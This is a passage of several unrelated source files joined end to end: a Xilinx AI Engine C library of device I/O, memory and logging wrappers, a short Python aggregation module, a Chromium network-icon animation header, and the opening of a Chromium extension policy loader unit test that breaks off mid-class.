workaround the elf loader issue. */ return XAieSim_LoadElf(TileInstPtr, ElfPtr, LoadSym); #endif } /*****************************************************************************/ /** * * This API loads the elf to corresponding tile * * @param TileInstPtr: Tile instance for the elf to be loaded * @param ElfPtr: pointer to the elf in memory * * @return XAIELIB_SUCCESS on success, otherwise XAIELIB_FAILURE * * @note None. * *******************************************************************************/ u32 XAieLib_LoadElfMem(XAieGbl_Tile *TileInstPtr, u8 *ElfPtr, u8 LoadSym) { #ifdef __AIESIM__ return XAIELIB_FAILURE; #elif defined __AIEBAREMTL__ return XAIELIB_FAILURE; #else return XAieSim_LoadElfMem(TileInstPtr, ElfPtr, LoadSym); #endif } /*****************************************************************************/ /** * * This API initializes the platform specific device instance if needed * * @param None. * * @return None. * * @note None. 
* *******************************************************************************/ void XAieLib_InitDev(void) { #ifdef __AIESIM__ #elif defined __AIEBAREMTL__ #else XAieIO_Init(); #endif } /*****************************************************************************/ /** * * This API initializes the platform specific tile instance if needed * * @param TileInstPtr: Tile instance to be initialized * * @return XAIELIB_SUCCESS on success, otherwise XAIELIB_FAILURE. * * @note If there's no platform specific initialization, * return XAIELIB_SUCCESS. * *******************************************************************************/ u32 XAieLib_InitTile(XAieGbl_Tile *TileInstPtr) { #ifdef __AIESIM__ return XAIELIB_SUCCESS; #elif defined __AIEBAREMTL__ return XAIELIB_SUCCESS; #else return XAieTileProc_Init(TileInstPtr); #endif } /*****************************************************************************/ /** * * This API unregisters the interrupt. * * @param Offest: Should be 1 - 3. * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_InterruptUnregisterIsr(int Offset) { #ifdef __AIESIM__ return; #elif defined __AIEBAREMTL__ return; #else XAieIO_IntrUnregisterIsr(Offset); #endif } /*****************************************************************************/ /** * * This API registers the handler for interrupt * * @param Offset: The value should one of 1 - 3. * @param Handler: the callback to be called upon interrupt. * @param Data: the data to be used with the handler. * * @return XAIELIB_SUCCESS on success, otherwise XAIELIB_FAILURE. * * @note None. * *******************************************************************************/ int XAieLib_InterruptRegisterIsr(int Offset, int (*Handler) (void *Data), void *Data) { #ifdef __AIESIM__ return XAIELIB_FAILURE; #elif defined __AIEBAREMTL__ return XAIELIB_FAILURE; #else return XAieIO_IntrRegisterIsr(Offset, Handler, Data); #endif } /*****************************************************************************/ /** * * This API enables AIE interrupt * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_InterruptEnable(void) { #ifdef __AIESIM__ return; #elif defined __AIEBAREMTL__ /* Enable exception for baremetal, * Once baremetal has interrupt abstration * layer to enable/disable particular interrupt. * driver can enable/disable AIE interrupt. */ Xil_ExceptionEnable(); #else XAieIO_IntrEnable(); #endif } /*****************************************************************************/ /** * * This API disables AIE interrupt * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_InterruptDisable(void) { #ifdef __AIESIM__ return; #elif defined __AIEBAREMTL__ /* Disable exception for baremetal, * Once baremetal has interrupt abstration * layer to enable/disable particular interrupt. * driver can enable/disable AIE interrupt. */ Xil_ExceptionDisable(); #else XAieIO_IntrDisable(); #endif } /*****************************************************************************/ /** * * This API re-routes to platform print function * * @param format strings * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_IntPrint(const char *Format, ...) { #ifdef __AIESIM__ /* * If XAieSim_print() is used, the driver should be built with * XAIE_DEBUG. 
Use print directly instead. */ printf(Format); #elif defined __AIEBAREMTL__ xil_printf(Format); #else va_list argptr; va_start(argptr, Format); vprintf(Format, argptr); va_end(argptr); #endif } /*****************************************************************************/ /** * * This API set the log file * * @param File - path of the file for logging. * * @return XAIE_SUCCESS for success or XAIE_FAILURE for failure. * * @note If will be fail if the file is failed to open, or if there is * already logging file opened. * *******************************************************************************/ u32 XAieLib_OpenLogFile(const char *File) { #ifdef __linux__ if (XAieLib_LogFPtr != XAIE_NULL) { return XAIELIB_FAILURE; } if (File == XAIE_NULL) { return XAIELIB_FAILURE; } XAieLib_LogFPtr = fopen(File, "a"); if (XAieLib_LogFPtr == XAIE_NULL) { XAieLib_IntPrint("Failed to open log file %s, %s.\n", File, strerror(errno)); return XAIE_FAILURE; } return XAIELIB_SUCCESS; #else (void)File; return XAIELIB_FAILURE; #endif } /*****************************************************************************/ /** * * This API close the log file * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_CloseLogFile(void) { #ifdef __linux__ if (XAieLib_LogFPtr != XAIE_NULL) { fclose(XAieLib_LogFPtr); XAieLib_LogFPtr = XAIE_NULL; } #else #endif } /*****************************************************************************/ /** * * This API implements AIE logging * * @param Level - Log level * @param Format - format string * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_log(XAieLib_LogLevel Level, const char *Format, ...) { static const char *Level_Str[] = { "XAIE: INFO: ", "XAIE: ERROR: ", }; #ifdef __AIEBAREMTL__ va_list args; va_start(args, Format); printf("%s", Level_Str[Level]); vprintf(Format, args); va_end(args); #else /* __linux__ */ va_list args; FILE *FPtr; va_start(args, Format); if (XAieLib_LogFPtr == NULL) { if (Level == XAIELIB_LOGERROR) { FPtr = stderr; } else { FPtr = stdout; } } else { FPtr = XAieLib_LogFPtr; } fprintf(FPtr,"%s", Level_Str[Level]); vfprintf(FPtr, Format, args); va_end(args); if (XAieLib_LogFPtr != NULL) { fflush(FPtr); } #endif } /*****************************************************************************/ /** * * This is the memory function to initialize the platform specific memory * instance. * * @param idx: Index of the memory to initialize. * * @return Pointer to the initialized memory instance. Null or 0 if not * supported. * * @note None. * *******************************************************************************/ XAieLib_MemInst *XAieLib_MemInit(u8 idx) { #ifdef __AIESIM__ return 0; #elif defined __AIEBAREMTL__ XAieLib_MemInst *XAieLib_MemInstPtr; XAieLib_MemInstPtr = malloc(sizeof(*XAieLib_MemInstPtr)); if (!XAieLib_MemInstPtr) return NULL; XAieLib_MemInstPtr->Vaddr = (u64)malloc(XAIELIB_BAREMTL_DEF_MEM_SIZE); if (!XAieLib_MemInstPtr->Vaddr) { free(XAieLib_MemInstPtr); return NULL; } XAieLib_MemInstPtr->Paddr = XAieLib_MemInstPtr->Vaddr; XAieLib_MemInstPtr->Size = XAIELIB_BAREMTL_DEF_MEM_SIZE; return XAieLib_MemInstPtr; #else return (XAieLib_MemInst *)XAieIO_MemInit(idx); #endif } /*****************************************************************************/ /** * * This is the memory function to free the platform specific memory instance * * @param XAieLib_MemInstPtr: Memory instance pointer. 
* * @return None. * * @note @IO_MemInstPtr is freed and invalid after this function. * *******************************************************************************/ void XAieLib_MemFinish(XAieLib_MemInst *XAieLib_MemInstPtr) { #ifdef __AIESIM__ #elif defined __AIEBAREMTL__ free((void *)XAieLib_MemInstPtr->Vaddr); free(XAieLib_MemInstPtr); #else XAieIO_Mem *MemInstPtr = (XAieIO_Mem *)XAieLib_MemInstPtr; XAieIO_MemFinish(MemInstPtr); #endif } /*****************************************************************************/ /** * * This is the memory function to attach the external memory to device * * @param Vaddr: Vaddr of the memory * @param Paddr: Paddr of the memory * @param Size: Size of the memory * @param MemHandle: Handle of the memory. For linux, dmabuf fd * * @return Pointer to the attached memory instance. * * @note Some arguments are not required for some backend platforms. * This is determined by platform implementation. * *******************************************************************************/ XAieLib_MemInst *XAieLib_MemAttach(u64 Vaddr, u64 Paddr, u64 Size, u64 MemHandle) { #ifdef __AIESIM__ return 0; #elif defined __AIEBAREMTL__ XAieLib_MemInst *XAieLib_MemInstPtr; XAieLib_MemInstPtr = malloc(sizeof(*XAieLib_MemInstPtr)); if (!XAieLib_MemInstPtr) return NULL; /* In baremetal, the handle doesn't exist */ XAieLib_MemInstPtr->Vaddr = Vaddr; XAieLib_MemInstPtr->Paddr = Paddr; XAieLib_MemInstPtr->Size = Size; return XAieLib_MemInstPtr; #else return (XAieLib_MemInst *)XAieIO_MemAttach(Vaddr, Paddr, Size, MemHandle); #endif } /*****************************************************************************/ /** * * This is the memory function to detach the memory from device * * @param XAieLib_MemInstPtr: Memory instance pointer. * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_MemDetach(XAieLib_MemInst *XAieLib_MemInstPtr) { #ifdef __AIESIM__ #elif defined __AIEBAREMTL__ /* In baremetal expect the handle to be the paddr / vaddr */ free(XAieLib_MemInstPtr); #else XAieIO_MemDetach((XAieIO_Mem *)XAieLib_MemInstPtr); #endif } /*****************************************************************************/ /** * * This is the memory function to allocate a memory * * @param Size: Size of the memory * @param Attr: Any of XAIELIB_MEM_ATTR_* * * @return Pointer to the allocated IO memory instance. * * @note None. * *******************************************************************************/ XAieLib_MemInst *XAieLib_MemAllocate(u64 Size, u32 Attr) { #ifdef __AIESIM__ return 0; #elif defined __AIEBAREMTL__ XAieLib_MemInst *XAieLib_MemInstPtr; XAieLib_MemInstPtr = malloc(sizeof(*XAieLib_MemInstPtr)); if (!XAieLib_MemInstPtr) return NULL; XAieLib_MemInstPtr->Vaddr = (u64)malloc(Size); XAieLib_MemInstPtr->Paddr = XAieLib_MemInstPtr->Vaddr; XAieLib_MemInstPtr->Size = Size; /* * 'Attr' is not handled at the moment. So it's always cached, and * the sync or accessor function takes care of it. */ return XAieLib_MemInstPtr; #else return (XAieLib_MemInst *)XAieIO_MemAllocate(Size, Attr); #endif } /*****************************************************************************/ /** * * This is the memory function to free the memory * * @param XAieLib_MemInstPtr: IO Memory instance pointer. * * @return None. * * @note None. 
* *******************************************************************************/ void XAieLib_MemFree(XAieLib_MemInst *XAieLib_MemInstPtr) { #ifdef __AIESIM__ #elif defined __AIEBAREMTL__ free((void *)XAieLib_MemInstPtr->Vaddr); free(XAieLib_MemInstPtr); #else XAieIO_MemFree((XAieIO_Mem *)XAieLib_MemInstPtr); #endif } /*****************************************************************************/ /** * * This is the memory function to sync the memory for CPU * * @param XAieLib_MemInstPtr: IO Memory instance pointer. * * @return XAIELIB_SUCCESS if successful. * * @note None. * *******************************************************************************/ u8 XAieLib_MemSyncForCPU(XAieLib_MemInst *XAieLib_MemInstPtr) { #ifdef __AIESIM__ return 0; #elif defined __AIEBAREMTL__ Xil_DCacheInvalidateRange(XAieLib_MemInstPtr->Vaddr, XAieLib_MemInstPtr->Size); return 0; #else return XAieIO_MemSyncForCPU((XAieIO_Mem *)XAieLib_MemInstPtr); #endif } /*****************************************************************************/ /** * * This is the memory function to sync the memory for device * * @param XAieLib_MemInstPtr: IO Memory instance pointer. * * @return XAIELIB_SUCCESS if successful. * * @note None. * *******************************************************************************/ u8 XAieLib_MemSyncForDev(XAieLib_MemInst *XAieLib_MemInstPtr) { #ifdef __AIESIM__ return 0; #elif defined __AIEBAREMTL__ Xil_DCacheFlushRange(XAieLib_MemInstPtr->Vaddr, XAieLib_MemInstPtr->Size); return 0; #else return XAieIO_MemSyncForDev((XAieIO_Mem *)XAieLib_MemInstPtr); #endif } /*****************************************************************************/ /** * * This is the memory function to return the size of the memory instance * * @param XAieLib_MemInstPtr: Memory instance pointer. * * @return size of the memory instance. 0 if not supported. * * @note None. * *******************************************************************************/ u64 XAieLib_MemGetSize(XAieLib_MemInst *XAieLib_MemInstPtr) { #ifdef __AIESIM__ return 0; #elif defined __AIEBAREMTL__ return XAieLib_MemInstPtr->Size - ((u64)XAieLib_MemInstPtr->Vaddr % XAIELIB_SHIM_MEM_ALIGN); #else XAieIO_Mem *MemInstPtr = (XAieIO_Mem *)XAieLib_MemInstPtr; return XAieIO_MemGetSize(MemInstPtr); #endif } /*****************************************************************************/ /** * * This is the memory function to return the virtual address of * the memory instance * * @param XAieLib_MemInstPtr: Memory instance pointer. * * @return Mapped virtual address of the memory instance. * 0 if not supported. * * @note None. * *******************************************************************************/ u64 XAieLib_MemGetVaddr(XAieLib_MemInst *XAieLib_MemInstPtr) { #ifdef __AIESIM__ return 0; #elif defined __AIEBAREMTL__ return ((u64)XAieLib_MemInstPtr->Vaddr + XAIELIB_SHIM_MEM_ALIGN - 1) & ~(XAIELIB_SHIM_MEM_ALIGN - 1); #else XAieIO_Mem *MemInstPtr = (XAieIO_Mem *)XAieLib_MemInstPtr; return XAieIO_MemGetVaddr(MemInstPtr); #endif } /*****************************************************************************/ /** * * This is the memory function to return the virtual address of * the memory instance * * @param XAieLib_MemInstPtr: Memory instance pointer. * * @return Physical address of the memory instance. 0 if not supported. * * @note None. 
* *******************************************************************************/ u64 XAieLib_MemGetPaddr(XAieLib_MemInst *XAieLib_MemInstPtr) { #ifdef __AIESIM__ return 0; #elif defined __AIEBAREMTL__ return ((u64)XAieLib_MemInstPtr->Vaddr + XAIELIB_SHIM_MEM_ALIGN - 1) & ~(XAIELIB_SHIM_MEM_ALIGN - 1); #else XAieIO_Mem *MemInstPtr = (XAieIO_Mem *)XAieLib_MemInstPtr; return XAieIO_MemGetPaddr(MemInstPtr); #endif } /*****************************************************************************/ /** * * This is the memory function to write to the physical address. * * @param XAieLib_MemInstPtr: Memory instance pointer. * @param Addr: Absolute physical address to write. * @param Data: A 32 bit data to write. * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_MemWrite32(XAieLib_MemInst *XAieLib_MemInstPtr, u64 Addr, u32 Data) { #ifdef __AIESIM__ #elif defined __AIEBAREMTL__ Xil_Out32(Addr, Data); Xil_DCacheFlushRange(Addr, 4); #else XAieIO_Mem *MemInstPtr = (XAieIO_Mem *)XAieLib_MemInstPtr; XAieIO_MemWrite32(MemInstPtr, Addr, Data); #endif } /*****************************************************************************/ /** * * This is the memory function to read from the physical address. * * @param XAieLib_MemInstPtr: Memory instance pointer. * @param Addr: Absolute physical address to write. * * @return A read 32 bit data. 0 if not supported. * * @note None. * *******************************************************************************/ u32 XAieLib_MemRead32(XAieLib_MemInst *XAieLib_MemInstPtr, u64 Addr) { #ifdef __AIESIM__ return 0; #elif defined __AIEBAREMTL__ Xil_DCacheInvalidateRange(Addr, 4); return Xil_In32(Addr); #else XAieIO_Mem *MemInstPtr = (XAieIO_Mem *)XAieLib_MemInstPtr; return XAieIO_MemRead32(MemInstPtr, Addr); #endif } /*****************************************************************************/ /** * * This is the memory IO function to read 32bit data from the specified address. * * @param Addr: Address to read from. * * @return 32-bit read value. * * @note None. * *******************************************************************************/ u32 XAieLib_Read32(u64 Addr) { #ifdef __AIESIM__ return(XAieSim_Read32(Addr)); #elif defined __AIEBAREMTL__ return(Xil_In32(Addr)); #else return(XAieIO_Read32(Addr)); #endif } /*****************************************************************************/ /** * * This is the memory IO function to read 128b data from the specified address. * * @param Addr: Address to read from. * @param Data: Pointer to the 128-bit buffer to store the read data. * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_Read128(u64 Addr, u32 *Data) { u8 Idx; for(Idx = 0U; Idx < 4U; Idx++) { #ifdef __AIESIM__ Data[Idx] = XAieSim_Read32(Addr + Idx*4U); #elif defined __AIEBAREMTL__ Data[Idx] = Xil_In32(Addr + Idx*4U); #else Data[Idx] = XAieIO_Read32(Addr + Idx*4U); #endif } } /*****************************************************************************/ /** * * This is the memory IO function to write 32bit data to the specified address. * * @param Addr: Address to write to. * @param Data: 32-bit data to be written. * * @return None. * * @note None. 
* *******************************************************************************/ void XAieLib_Write32(u64 Addr, u32 Data) { #ifdef __AIESIM__ XAieSim_Write32(Addr, Data); #elif defined __AIEBAREMTL__ Xil_Out32(Addr, Data); #else XAieIO_Write32(Addr, Data); #endif } /*****************************************************************************/ /** * * This is the memory IO function to write a masked 32bit data to * the specified address. * * @param Addr: Address to write to. * @param Mask: Mask to be applied to Data. * @param Data: 32-bit data to be written. * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_MaskWrite32(u64 Addr, u32 Mask, u32 Data) { u32 RegVal; #ifdef __AIESIM__ XAieSim_MaskWrite32(Addr, Mask, Data); #elif defined __AIEBAREMTL__ RegVal = Xil_In32(Addr); RegVal &= ~Mask; RegVal |= Data; Xil_Out32(Addr, RegVal); #else RegVal = XAieIO_Read32(Addr); RegVal &= ~Mask; RegVal |= Data; XAieIO_Write32(Addr, RegVal); #endif } /*****************************************************************************/ /** * * This is the memory IO function to write 128bit data to the specified address. * * @param Addr: Address to write to. * @param Data: Pointer to the 128-bit data buffer. * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_Write128(u64 Addr, u32 *Data) { #ifdef __AIESIM__ XAieSim_Write128(Addr, Data); #elif defined __AIEBAREMTL__ u8 Idx; for(Idx = 0U; Idx < 4U; Idx++) { Xil_Out32((u32)Addr + Idx * 4U, Data[Idx]); } #else XAieIO_Write128(Addr, Data); #endif } /*****************************************************************************/ /** * * This is the memory IO function to write 128bit data to the specified address. * * @param Addr: Address to write to. * @param Data: Pointer to the 128-bit data buffer. * * @return None. * * @note None. * *******************************************************************************/ void XAieLib_WriteCmd(u8 Command, u8 ColId, u8 RowId, u32 CmdWd0, u32 CmdWd1, u8 *CmdStr) { #ifdef __AIESIM__ XAieSim_WriteCmd(Command, ColId, RowId, CmdWd0, CmdWd1, CmdStr); #elif defined __AIEBAREMTL__ #endif } /*****************************************************************************/ /** * * This is the IO function to poll until the value at the address to be given * masked value. * * @param Addr: Address to write to. * @param Mask: Mask to be applied to read data. * @param Value: The expected value * @param TimeOutUs: Minimum timeout in usec. * * @return XAIELIB_SUCCESS on success, otherwise XAIELIB_FAILURE * * @note None. * *******************************************************************************/ u32 XAieLib_MaskPoll(u64 Addr, u32 Mask, u32 Value, u32 TimeOutUs) { u32 Ret = XAIELIB_FAILURE; #ifdef __AIESIM__ if (XAieSim_MaskPoll(Addr, Mask, Value, TimeOutUs) == XAIESIM_SUCCESS) { Ret = XAIELIB_SUCCESS; } #else u32 Count, MinTimeOutUs; /* * Any value less than 200 us becomes noticable overhead. This is based * on some profiling, and it may vary between platforms. 
*/ MinTimeOutUs = 200; Count = ((u64)TimeOutUs + MinTimeOutUs - 1) / MinTimeOutUs; while (Count > 0U) { if ((XAieLib_Read32(Addr) & Mask) == Value) { Ret = XAIELIB_SUCCESS; break; } XAieLib_usleep(MinTimeOutUs); Count--; } /* Check for the break from timed-out loop */ if ((Ret == XAIELIB_FAILURE) && ((XAieLib_Read32(Addr) & Mask) == Value)) { Ret = XAIELIB_SUCCESS; } #endif return Ret; } /*****************************************************************************/ /** * * This is the NPI IO function to read 32bit data from the specified address. * * @param Addr: Address to read from. * * @return 32-bit read value. * * @note This only work if NPI is accessble. * *******************************************************************************/ u32 XAieLib_NPIRead32(u64 Addr) { #ifdef __AIESIM__ return XAieSim_NPIRead32(Addr); #elif defined __AIEBAREMTL__ return Xil_In32(Addr); #else return XAieIO_NPIRead32(Addr); #endif } /*****************************************************************************/ /** * * This is the internal NPI function to set the lock of AIE NPI space * * @param Lock: non 0 for lock, 0 for unlock * * @note Used only in this file. * This only work if NPI is accessble. * *******************************************************************************/ static void XAieLib_NPISetLock(u8 Lock) { u32 RegAddr, RegVal; RegAddr = XAIE_NPI_PCSR_LOCK; if (Lock == 0) { RegVal = XAIE_NPI_PCSR_LOCK_STATE_UNLOCK_CODE << XAIE_NPI_PCSR_LOCK_STATE_LSB; } else { RegVal = XAIE_NPI_PCSR_LOCK_STATE_LOCK_CODE << XAIE_NPI_PCSR_LOCK_STATE_LSB; } #ifdef __AIESIM__ XAieSim_NPIWrite32(RegAddr, RegVal); #elif defined __AIEBAREMTL__ Xil_Out32(RegAddr, RegVal); #else XAieIO_NPIWrite32(RegAddr, RegVal); #endif } /*****************************************************************************/ /** * * This is the NPI IO function to write 32bit data to the specified address. * * @param Addr: Address to write to. * @param Data: 32-bit data to be written. * * @return None. * * @note This only work if NPI is accessble. * *******************************************************************************/ void XAieLib_NPIWrite32(u64 Addr, u32 Data) { XAieLib_NPISetLock(0); #ifdef __AIESIM__ XAieSim_NPIWrite32(Addr, Data); #elif defined __AIEBAREMTL__ Xil_Out32(Addr, Data); #else XAieIO_NPIWrite32(Addr, Data); #endif XAieLib_NPISetLock(1); } /*****************************************************************************/ /** * * This is the NPI IO function to write a masked 32bit data to * the specified address. * * @param Addr: Address to write to. * @param Mask: Mask to be applied to Data. * @param Data: 32-bit data to be written. * * @return None. * * @note This only work if NPI is accessble. * *******************************************************************************/ void XAieLib_NPIMaskWrite32(u64 Addr, u32 Mask, u32 Data) { u32 RegVal; XAieLib_NPISetLock(0); #ifdef __AIESIM__ XAieSim_NPIMaskWrite32(Addr, Mask, Data); #elif defined __AIEBAREMTL__ RegVal = Xil_In32(Addr); RegVal &= ~Mask; RegVal |= Data; Xil_Out32(Addr, RegVal); #else RegVal = XAieIO_NPIRead32(Addr); RegVal &= ~Mask; RegVal |= Data; XAieIO_NPIWrite32(Addr, RegVal); #endif XAieLib_NPISetLock(1); } /*****************************************************************************/ /** * * This is the NPI IO function to poll until the value at the address to be given * masked value. * * @param Addr: Address to write to. * @param Mask: Mask to be applied to read data. 
* @param Value: The expected value * @param TimeOutUs: Minimum timeout in usec. * * @return XAIELIB_SUCCESS on success, otherwise XAIELIB_FAILURE * * @note This only work if NPI is accessble. * *******************************************************************************/ u32 XAieLib_NPIMaskPoll(u64 Addr, u32 Mask, u32 Value, u32 TimeOutUs) { u32 Ret = XAIELIB_FAILURE; #ifdef __AIESIM__ if (XAieSim_NPIMaskPoll(Addr, Mask, Value, TimeOutUs) == XAIESIM_SUCCESS) { Ret = XAIELIB_SUCCESS; } #else u32 Count, MinTimeOutUs; /* * Any value less than 200 us becomes noticable overhead. This is based * on some profiling, and it may vary between platforms. */ MinTimeOutUs = 200; Count = ((u64)TimeOutUs + MinTimeOutUs - 1) / MinTimeOutUs; while (Count > 0U) { if ((XAieLib_NPIRead32(Addr) & Mask) == Value) { Ret = XAIELIB_SUCCESS; break; } XAieLib_usleep(MinTimeOutUs); Count--; } /* Check for the break from timed-out loop */ if ((Ret == XAIELIB_FAILURE) && ((XAieLib_NPIRead32(Addr) & Mask) == Value)) { Ret = XAIELIB_SUCCESS; } #endif return Ret; } /** @} */
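/*****************************************************************************/
/**
*
* Illustrative sketch only (not part of the library): a typical write-then-poll
* sequence composed from the accessors above. The register address and mask
* below are placeholders rather than real AIE registers, and the snippet is
* guarded out so it never affects a build.
*
*******************************************************************************/
#if 0
static u32 XAieLib_ExampleWriteAndPoll(void)
{
	u64 RegAddr  = 0x0U;	/* placeholder register address */
	u32 DoneMask = 0x1U;	/* placeholder "done" bit */

	/* Kick off the operation, then wait up to 1000 us for the done bit to set. */
	XAieLib_Write32(RegAddr, 0x1U);
	return XAieLib_MaskPoll(RegAddr, DoneMask, DoneMask, 1000U);
}
#endif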
# Copyright (c) 2018 Uber Technologies, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from functools import reduce from operator import mul def sum_aggregation(inputs): return sum(inputs) def prod_aggregation(inputs): return reduce(mul, inputs, 1) str_to_aggregation = { 'sum': sum_aggregation, 'prod': prod_aggregation, }
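

# Illustrative usage sketch (not part of the library): the aggregation is looked
# up by its configured name and applied to a node's incoming values. The input
# list below is hypothetical.
if __name__ == '__main__':
    inputs = [1.0, 2.0, 4.0]
    assert str_to_aggregation['sum'](inputs) == 7.0
    assert str_to_aggregation['prod'](inputs) == 8.0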
// Copyright (c) 2013 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

#ifndef ASH_SYSTEM_NETWORK_NETWORK_ICON_ANIMATION_H_
#define ASH_SYSTEM_NETWORK_NETWORK_ICON_ANIMATION_H_

#include "ash/ash_export.h"
#include "base/observer_list.h"
#include "ui/gfx/animation/animation_delegate.h"
#include "ui/gfx/animation/throb_animation.h"

namespace ash {
namespace network_icon {

class AnimationObserver;

// Single instance class to handle icon animations and keep them in sync.
class ASH_EXPORT NetworkIconAnimation : public gfx::AnimationDelegate {
 public:
  NetworkIconAnimation();
  ~NetworkIconAnimation() override;

  // Returns the current animation value, [0-1].
  double GetAnimation();

  // The animation stops when all observers have been removed.
  // Be sure to remove observers when no associated icons are animating.
  void AddObserver(AnimationObserver* observer);
  void RemoveObserver(AnimationObserver* observer);

  // gfx::AnimationDelegate implementation.
  void AnimationProgressed(const gfx::Animation* animation) override;

  static NetworkIconAnimation* GetInstance();

 private:
  gfx::ThrobAnimation animation_;
  base::ObserverList<AnimationObserver>::Unchecked observers_;
};

}  // namespace network_icon
}  // namespace ash

#endif  // ASH_SYSTEM_NETWORK_NETWORK_ICON_ANIMATION_H_
<reponame>iridium-browser/iridium-browser<filename>chrome/browser/chromeos/extensions/device_local_account_external_policy_loader_unittest.cc // Copyright 2013 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "chrome/browser/chromeos/extensions/device_local_account_external_policy_loader.h" #include <string> #include <utility> #include "base/bind.h" #include "base/callback.h" #include "base/files/file_util.h" #include "base/files/scoped_temp_dir.h" #include "base/macros.h" #include "base/path_service.h" #include "base/run_loop.h" #include "base/single_thread_task_runner.h" #include "base/strings/stringprintf.h" #include "base/task/current_thread.h" #include "base/threading/thread_task_runner_handle.h" #include "base/values.h" #include "base/version.h" #include "build/build_config.h" #include "build/chromeos_buildflags.h" #include "chrome/browser/extensions/external_provider_impl.h" #include "chrome/common/chrome_paths.h" #include "chrome/test/base/testing_browser_process.h" #include "chrome/test/base/testing_profile.h" #include "components/policy/core/common/cloud/mock_cloud_policy_store.h" #include "components/policy/core/common/policy_map.h" #include "components/policy/core/common/policy_types.h" #include "components/policy/policy_constants.h" #include "content/public/browser/notification_service.h" #include "content/public/browser/notification_source.h" #include "content/public/test/browser_task_environment.h" #include "content/public/test/test_utils.h" #include "extensions/browser/external_install_info.h" #include "extensions/browser/external_provider_interface.h" #include "extensions/browser/notification_types.h" #include "extensions/browser/updater/extension_downloader.h" #include "extensions/common/extension.h" #include "extensions/common/extension_urls.h" #include "extensions/common/manifest.h" #include "services/data_decoder/public/cpp/test_support/in_process_data_decoder.h" #include "services/network/public/cpp/weak_wrapper_shared_url_loader_factory.h" #include "services/network/test/test_url_loader_factory.h" #include "testing/gmock/include/gmock/gmock.h" #include "testing/gtest/include/gtest/gtest.h" #include "url/gurl.h" #if BUILDFLAG(IS_CHROMEOS_ASH) #include "chrome/browser/ash/settings/scoped_cros_settings_test_helper.h" #endif // BUILDFLAG(IS_CHROMEOS_ASH) using extensions::ExternalInstallInfoFile; using extensions::ExternalInstallInfoUpdateUrl; using extensions::mojom::ManifestLocation; using ::testing::_; using ::testing::Field; using ::testing::InvokeWithoutArgs; using ::testing::Mock; using ::testing::StrEq; namespace chromeos { namespace { const char kCacheDir[] = "cache"; const char kExtensionId[] = "ldnnhddmnhbkjipkidpdiheffobcpfmf"; const char kExtensionUpdateManifest[] = "extensions/good_v1_update_manifest.xml"; const char kExtensionCRXVersion[] = "1.0.0.0"; class MockExternalPolicyProviderVisitor : public extensions::ExternalProviderInterface::VisitorInterface { public: MockExternalPolicyProviderVisitor(); virtual ~MockExternalPolicyProviderVisitor(); MOCK_METHOD1(OnExternalExtensionFileFound, bool(const ExternalInstallInfoFile&)); MOCK_METHOD2(OnExternalExtensionUpdateUrlFound, bool(const ExternalInstallInfoUpdateUrl&, bool)); MOCK_METHOD1(OnExternalProviderReady, void(const extensions::ExternalProviderInterface* provider)); MOCK_METHOD4(OnExternalProviderUpdateComplete, void(const extensions::ExternalProviderInterface*, const 
std::vector<ExternalInstallInfoUpdateUrl>&, const std::vector<ExternalInstallInfoFile>&, const std::set<std::string>& removed_extensions)); private: DISALLOW_COPY_AND_ASSIGN(MockExternalPolicyProviderVisitor); }; MockExternalPolicyProviderVisitor::MockExternalPolicyProviderVisitor() { } MockExternalPolicyProviderVisitor::~MockExternalPolicyProviderVisitor() { } // A simple wrapper around a SingleThreadTaskRunner. When a task is posted // through it, increments a counter which is decremented when the task is run. class TrackingProxyTaskRunner : public base::SingleThreadTaskRunner { public: TrackingProxyTaskRunner( scoped_refptr<base::SingleThreadTaskRunner> task_runner) : wrapped_task_runner_(std::move(task_runner)) {} bool PostDelayedTask(const base::Location& from_here, base::OnceClosure task, base::TimeDelta delay) override { DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_); ++pending_task_count_; return wrapped_task_runner_->PostDelayedTask( from_here, base::BindOnce(&TrackingProxyTaskRunner::RunTask, this, std::move(task)), delay); } bool PostNonNestableDelayedTask(const base::Location& from_here, base::OnceClosure task, base::TimeDelta delay) override { DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_); ++pending_task_count_; return wrapped_task_runner_->PostNonNestableDelayedTask( from_here, base::BindOnce(&TrackingProxyTaskRunner::RunTask, this, std::move(task)), delay); } bool RunsTasksInCurrentSequence() const override { return wrapped_task_runner_->RunsTasksInCurrentSequence(); } bool has_pending_tasks() const { DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_); return pending_task_count_ != 0; } private: ~TrackingProxyTaskRunner() override = default; void RunTask(base::OnceClosure task) { DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_); DCHECK_GT(pending_task_count_, 0); --pending_task_count_; std::move(task).Run(); } scoped_refptr<base::SingleThreadTaskRunner> wrapped_task_runner_; SEQUENCE_CHECKER(sequence_checker_); int pending_task_count_ = 0; }; } // namespace class DeviceLocalAccountExternalPolicyLoaderTest : public testing::Test { protected: DeviceLocalAccountExternalPolicyLoaderTest(); ~DeviceLocalAccountExternalPolicyLoaderTest() override; void SetUp() override; void TearDown() override; void VerifyAndResetVisitorCallExpectations(); void SetForceInstallListPolicy(); content::BrowserTaskEnvironment task_environment_; data_decoder::test::InProcessDataDecoder in_process_data_decoder_; std::unique_ptr<TestingProfile> profile_; base::ScopedTempDir temp_dir_; base::FilePath cache_dir_; policy::MockCloudPolicyStore store_; network::TestURLLoaderFactory test_url_loader_factory_; 